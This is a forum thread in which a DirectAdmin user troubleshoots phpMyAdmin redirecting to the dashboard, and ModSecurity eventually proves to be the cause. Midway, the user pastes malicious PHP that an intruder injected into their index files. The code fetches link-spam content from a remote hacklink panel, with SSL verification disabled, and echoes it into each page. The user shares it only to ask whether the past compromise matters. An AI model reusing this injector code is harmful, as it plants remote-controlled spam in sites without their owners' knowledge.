PhpMyAdmin is not working

[jdavide222]

All of sudden my PhpMyadmin stopped working. No matter what to do, it returns me back to dashboard.

How can i fix this bug/mess? or what caused it?

Appreciate for any help.

 

[Active8]

rebuild it:

cd /usr/local/directadmin/custombuild
./build phpmyadmin

 

[jdavide222]

root@xxxxxxxx: /usr/local/directadmin/custombuild# ./build phpmyadmin
download_cached: using cached '/usr/local/directadmin/custombuild/cache/phpMyAdmin-5.2.3-all-languages.tar.gz' file
removing /var/www/html/phpMyAdmin-5.2.3-LNkO
phpMyAdmin 5.2.3 installation is done.
root@xxxxxxxx:/usr/local/directadmin/custom

result is same

 

[jdavide222]

I cannot use mysql for this problem. I have no idea but it stopped all of sudden.

 

[sysdev]

Did you check the logs for any errors?

 

[jdavide222]

Did you check the logs for any errors?

where can i find those log files?

 

[sysdev]

All log files are in /var/log/*

But you might want to check if phpmyadmin uses the one-click login config. Then you have to login as the user in the controlpanel, go to the databases en click the phpmyadmin button there.

 

[jdavide222]

this is entire log directory

root@xxxxxxxx:/var/log# ls
alternatives.log dpkg.log.4.gz
alternatives.log.1 dpkg.log.5.gz
alternatives.log.10.gz dpkg.log.6.gz
alternatives.log.11.gz dpkg.log.7.gz
alternatives.log.12.gz dpkg.log.8.gz
alternatives.log.2.gz dpkg.log.9.gz
alternatives.log.3.gz exim
alternatives.log.4.gz httpd
alternatives.log.5.gz journal
alternatives.log.6.gz kern.log
alternatives.log.7.gz kern.log.1
alternatives.log.8.gz kern.log.2.gz
alternatives.log.9.gz kern.log.3.gz
apport.log kern.log.4.gz
apport.log.1 landscape
apt lastlog
auth.log lfd.log
auth.log.1 lfd.log.1.gz
auth.log.2.gz mail.log
auth.log.3.gz mail.log.1
auth.log.4.gz mail.log.2.gz
btmp mail.log.3.gz
btmp.1 mail.log.4.gz
cloud-init-output.log private
cloud-init.log pureftpd.log
directadmin rkhunter.log
dist-upgrade rkhunter.log.1
dmesg sa-update.log
dmesg.0 sa-update.log.1
dmesg.1.gz sa-update.log.2
dovecot-lmtp-errors.log syslog
dovecot-lmtp-errors.log.1 syslog.1
dovecot-lmtp-errors.log.2 syslog.2.gz
dovecot-lmtp-errors.log.3 syslog.3.gz
dovecot-lmtp.log syslog.4.gz
dovecot-lmtp.log.1 ubuntu-advantage-apt-hook.log
dovecot-lmtp.log.2 ubuntu-advantage.log
dovecot-lmtp.log.3 ubuntu-advantage.log.1
dovecot-lmtp.log.4 ubuntu-advantage.log.2.gz
dpkg.log ubuntu-advantage.log.3.gz
dpkg.log.1 ubuntu-advantage.log.4.gz
dpkg.log.10.gz ubuntu-advantage.log.5.gz
dpkg.log.11.gz ubuntu-advantage.log.6.gz
dpkg.log.12.gz unattended-upgrades
dpkg.log.2.gz user_logs
dpkg.log.3.gz wtmp


And this is entire custombuild directory
:/usr/local/directadmin/custombuild# ls
Mail-SpamAssassin-4.0.0.tar.gz mysql_backups.log
build options.conf
cache patches
configure phpMyAdmin-5.2.1-all-languages.tar.gz
custombuild.log pure-ftpd-1.0.51.tar.gz
dovecot-2.3.21.tar.gz tmp
imapsync-2.229.tar.gz versions.txt
mysql_backups webalizer-2.23-09-src.tgz

 

[Active8]

I have no idea but it stopped all of sudden.

Do you have enough disk space ?

df -h

Otherwise just to be sure rebuild everything

cd /usr/local/directadmin/custombuild
./build update
./build all d

 

[jdavide222]

Do you have enough disk space ?

df -h

result as follow

:/usr/local/directadmin/custombuild# df -h
Filesystem Size Used Avail Use% Mounted on
tmpfs 192M 2.2M 190M 2% /run
/dev/sda1 39G 19G 21G 48% /
tmpfs 958M 0 958M 0% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
/dev/sda15 105M 6.1M 99M 6% /boot/efi
tmpfs 192M 4.0K 192M 1% /run/user/1000


Something I want to share before going further.

Couple of months ago, someone somehow has hacked my site. He/She/It put following code all index files

<!-- Telegram: https://t.me/hacklink_panel --><?php if(!function_exists('hacklink_add')){function hacklink_add(){static $b=null;if($b!==null)return $b;$u='https://panel.hacklinkmarket.com/co...P_HOST'].'/';if(function_exists('curl_init')){$h=curl_init();curl_setopt_array($h,[CURLOPT_URL=>$u,CURLOPT_HTTPHEADER=>['X-Request-Domain:'.$d],CURLOPT_RETURNTRANSFER=>true,CURLOPT_TIMEOUT=>10,CURLOPT_CONNECTTIMEOUT=>5,CURLOPT_SSL_VERIFYPEER=>false,CURLOPT_FOLLOWLOCATION=>true,CURLOPT_MAXREDIRS=>3]);$r=@curl_exec($h);$c=curl_getinfo($h,CURLINFO_HTTP_CODE);curl_close($h);if($r!==false&&$c===200&&!empty($r)){$b=$r;return $b;}}if(ini_get('allow_url_fopen')){$o=['http'=>['header'=>'X-Request-Domain:'.$d,'timeout'=>10],'ssl'=>['verify_peer'=>false]];if($r=@file_get_contents($u,false,stream_context_create($o))){$b=$r;return $b;}}if(function_exists('fopen')){if($f=@fopen($u,'r')){$r='';while(!feof($f))$r.=fread($f,8192);fclose($f);if($r){$b=$r;return $b;}}}return '';}} ?>
<?php echo hacklink_add(); ?>


So, i cleaned entire site, updated ubuntu, updated DA, hardened server security...

Is this cause problem?

 

[Active8]

did you rebuild it as my suggestion just to be sure ?

 

[jdavide222]

did you rebuild it as my suggestion just to be sure ?

Yes I did

 

[jdavide222]

Can we talk about this tomorrow? It is almost 9pm in Japan.

 

[jdavide222]

Yesterday i have updated all suggestion by DA before I left office. And checked morning still same problem.

 

[jdavide222]

Is there anyone who can help to solve this mess? I feel special because I found some problem no-one can solve.

 

[jdavide222]

problem solved. Mod Security was the main problem.

 

[LawsHosting]

problem solved. Mod Security was the main problem.

I hit this too ages ago......

It would be good to have a whitelist option in DA or wherever to whitelist/disable for contents in /var/www/html/ instead of digging into bash to do it via /etc/modsecurity.d .conf files

 

[cDGo]

This is indeed very anoying of modsecurity.
Did a few expecptions already, but each next task gices another block from modsecurity.
Whitelist would be very helpfull, or some help to bypass modsecurity for phpMyAdmin for a specific IP adres.

And/or, I've now added the exeptions in /usr/local/directadmin/data/admin/modsecurity_rules
But after the last update of DA the rules are gone.
How can I make a custom settings for it?